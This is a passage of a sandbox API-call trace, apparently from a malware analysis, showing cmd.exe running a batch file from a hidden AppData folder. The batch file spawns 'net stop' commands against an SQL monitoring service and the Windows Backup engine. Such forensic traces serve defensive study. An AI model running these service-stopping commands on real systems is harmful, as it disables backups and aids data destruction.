lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xfb9, lpOverlapped=0x0) returned 1 [0050.220] SetFilePointer (in: hFile=0x78, lDistanceToMove=2355, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x933 [0050.220] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=43, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQLFDLauncher$SBSMONITORING /y\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 43 [0050.220] _get_osfhandle (_FileHandle=3) returned 0x78 [0050.220] GetFileType (hFile=0x78) returned 0x1 [0050.220] _get_osfhandle (_FileHandle=3) returned 0x78 [0050.220] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x933 [0050.220] GetProcessHeap () returned 0x3e0000 [0050.220] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0050.220] GetProcessHeap () returned 0x3e0000 [0050.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0050.220] _tell (_FileHandle=3) returned 2355 [0050.220] _close (_FileHandle=3) returned 0 [0050.221] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0050.221] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0050.221] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0050.221] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0050.221] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0050.221] _wcsicmp (_String1="net", _String2="CD") returned 11 [0050.221] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0050.221] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0050.221] _wcsicmp (_String1="net", _String2="REN") returned -4 [0050.221] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0050.221] _wcsicmp (_String1="net", _String2="SET") returned -5 [0050.221] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0050.221] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0050.221] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0050.221] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0050.221] _wcsicmp (_String1="net", _String2="MD") returned 1 [0050.221] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0050.221] _wcsicmp (_String1="net", _String2="RD") returned -4 [0050.221] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0050.221] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0050.221] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0050.221] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0050.221] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0050.221] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0050.221] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0050.221] _wcsicmp (_String1="net", _String2="VER") returned -8 [0050.221] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0050.221] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0050.221] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0050.221] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0050.221] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0050.221] _wcsicmp (_String1="net", _String2="START") returned -5 [0050.222] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0050.222] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0050.222] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0050.222] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0050.222] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0050.222] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0050.222] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0050.222] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0050.222] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0050.222] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0050.222] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0050.222] SetErrorMode (uMode=0x0) returned 0x1 [0050.222] GetProcessHeap () returned 0x3e0000 [0050.222] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0050.222] GetProcessHeap () returned 0x3e0000 [0050.222] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0050.222] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0050.222] GetProcessHeap () returned 0x3e0000 [0050.222] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0050.222] GetProcessHeap () returned 0x3e0000 [0050.222] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0050.222] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0050.222] GetProcessHeap () returned 0x3e0000 [0050.222] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0050.222] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0050.222] GetProcessHeap () returned 0x3e0000 [0050.222] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0050.222] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0050.222] GetProcessHeap () returned 0x3e0000 [0050.222] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0050.222] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.223] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0050.223] GetLastError () returned 0x2 [0050.223] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0050.223] GetLastError () returned 0x2 [0050.223] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.223] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0050.223] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0050.223] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0050.223] GetLastError () returned 0x2 [0050.223] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0050.223] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0050.224] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0050.224] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0050.224] SetErrorMode (uMode=0x0) returned 0x1 [0050.224] GetProcessHeap () returned 0x3e0000 [0050.224] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0050.224] GetProcessHeap () returned 0x3e0000 [0050.224] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0050.224] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0050.224] GetProcessHeap () returned 0x3e0000 [0050.224] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0050.224] GetProcessHeap () returned 0x3e0000 [0050.224] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0050.224] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0050.224] GetProcessHeap () returned 0x3e0000 [0050.224] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0050.224] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0050.224] GetProcessHeap () returned 0x3e0000 [0050.224] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0050.224] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0050.224] GetProcessHeap () returned 0x3e0000 [0050.224] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0050.224] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.224] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0050.225] GetLastError () returned 0x2 [0050.225] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0050.225] GetLastError () returned 0x2 [0050.225] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0050.225] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0050.225] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0050.225] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0050.225] GetLastError () returned 0x2 [0050.225] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0050.225] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0050.225] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0050.226] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0050.226] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0050.226] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0050.226] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0050.226] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQLFDLauncher$SBSMONITORING /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQLFDLauncher$SBSMONITORING /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQLFDLauncher$SBSMONITORING /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xa64, dwThreadId=0xa68)) returned 1 [0050.230] CloseHandle (hObject=0x78) returned 1 [0050.230] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0050.230] GetProcessHeap () returned 0x3e0000 [0050.230] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0050.230] GetEnvironmentStringsW () returned 0x3f8408* [0050.230] GetProcessHeap () returned 0x3e0000 [0050.230] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0050.230] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0050.230] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0196.153] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0196.153] CloseHandle (hObject=0x74) returned 1 [0196.154] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0196.154] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0196.154] GetProcessHeap () returned 0x3e0000 [0196.154] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0196.154] GetEnvironmentStringsW () returned 0x3f8408* [0196.154] GetProcessHeap () returned 0x3e0000 [0196.154] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0196.154] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0196.154] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0196.154] GetProcessHeap () returned 0x3e0000 [0196.154] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0196.154] GetEnvironmentStringsW () returned 0x3f8408* [0196.154] GetProcessHeap () returned 0x3e0000 [0196.154] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0196.154] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0196.154] GetProcessHeap () returned 0x3e0000 [0196.154] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0196.154] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0196.154] _get_osfhandle (_FileHandle=1) returned 0x264 [0196.154] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0196.155] _get_osfhandle (_FileHandle=1) returned 0x264 [0196.155] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0196.155] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0196.155] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0196.155] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0196.155] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0196.156] SetConsoleInputExeNameW () returned 0x1 [0196.156] GetConsoleOutputCP () returned 0x1b5 [0196.156] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0196.156] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0196.156] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0196.157] _get_osfhandle (_FileHandle=3) returned 0x74 [0196.157] SetFilePointer (in: hFile=0x74, lDistanceToMove=2355, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x933 [0196.157] GetProcessHeap () returned 0x3e0000 [0196.157] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0196.157] GetProcessHeap () returned 0x3e0000 [0196.157] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0196.157] GetProcessHeap () returned 0x3e0000 [0196.157] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0196.157] GetProcessHeap () returned 0x3e0000 [0196.157] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0196.157] GetProcessHeap () returned 0x3e0000 [0196.157] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcaf0 | out: hHeap=0x3e0000) returned 1 [0196.157] GetProcessHeap () returned 0x3e0000 [0196.157] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0196.157] GetProcessHeap () returned 0x3e0000 [0196.157] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0196.157] GetProcessHeap () returned 0x3e0000 [0196.157] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0196.157] GetProcessHeap () returned 0x3e0000 [0196.157] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0196.157] GetProcessHeap () returned 0x3e0000 [0196.157] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0196.157] GetProcessHeap () returned 0x3e0000 [0196.157] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0196.157] GetProcessHeap () returned 0x3e0000 [0196.157] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0196.157] GetProcessHeap () returned 0x3e0000 [0196.157] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0196.157] _get_osfhandle (_FileHandle=3) returned 0x74 [0196.158] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x933 [0196.158] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xf8e, lpOverlapped=0x0) returned 1 [0196.158] SetFilePointer (in: hFile=0x74, lDistanceToMove=2377, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x949 [0196.158] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=22, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop wbengine /y\r\ner$SBSMONITORING /y\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 22 [0196.159] _get_osfhandle (_FileHandle=3) returned 0x74 [0196.159] GetFileType (hFile=0x74) returned 0x1 [0196.159] _get_osfhandle (_FileHandle=3) returned 0x74 [0196.159] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x949 [0196.159] GetProcessHeap () returned 0x3e0000 [0196.159] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0196.159] GetProcessHeap () returned 0x3e0000 [0196.159] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0196.160] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3f90 [0196.160] GetProcessHeap () returned 0x3e0000 [0196.160] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x10) returned 0x3f6a58 [0196.161] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x2c) returned 0x3e1290 [0196.163] _tell (_FileHandle=3) returned 2377 [0196.163] _close (_FileHandle=3) returned 0 [0196.163] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0196.163] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0196.163] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0196.163] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0196.163] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0196.163] _wcsicmp (_String1="net", _String2="CD") returned 11 [0196.163] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0196.163] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0196.164] _wcsicmp (_String1="net", _String2="REN") returned -4 [0196.164] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0196.164] _wcsicmp (_String1="net", _String2="SET") returned -5 [0196.164] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0196.164] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0196.164] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0196.164] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0196.164] _wcsicmp (_String1="net", _String2="MD") returned 1 [0196.164] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0196.164] _wcsicmp (_String1="net", _String2="RD") returned -4 [0196.164] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0196.164] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0196.164] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0196.164] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0196.164] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0196.164] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0196.164] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0196.164] _wcsicmp (_String1="net", _String2="VER") returned -8 [0196.164] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0196.164] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0196.164] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0196.164] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0196.164] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0196.164] _wcsicmp (_String1="net", _String2="START") returned -5 [0196.164] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0196.164] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0196.164] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0196.164] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0196.164] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0196.164] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0196.164] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0196.164] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0196.164] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0196.164] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0196.165] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0196.165] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0196.166] SetErrorMode (uMode=0x0) returned 0x1 [0196.166] GetProcessHeap () returned 0x3e0000 [0196.166] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0196.166] GetProcessHeap () returned 0x3e0000 [0196.166] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0196.166] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0196.166] GetProcessHeap () returned 0x3e0000 [0196.166] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0196.166] GetProcessHeap () returned 0x3e0000 [0196.166] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0196.167] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0196.167] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.167] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0196.168] GetLastError () returned 0x2 [0196.168] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0196.168] GetLastError () returned 0x2 [0196.168] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.169] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0196.169] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0196.169] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0196.170] GetLastError () returned 0x2 [0196.170] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 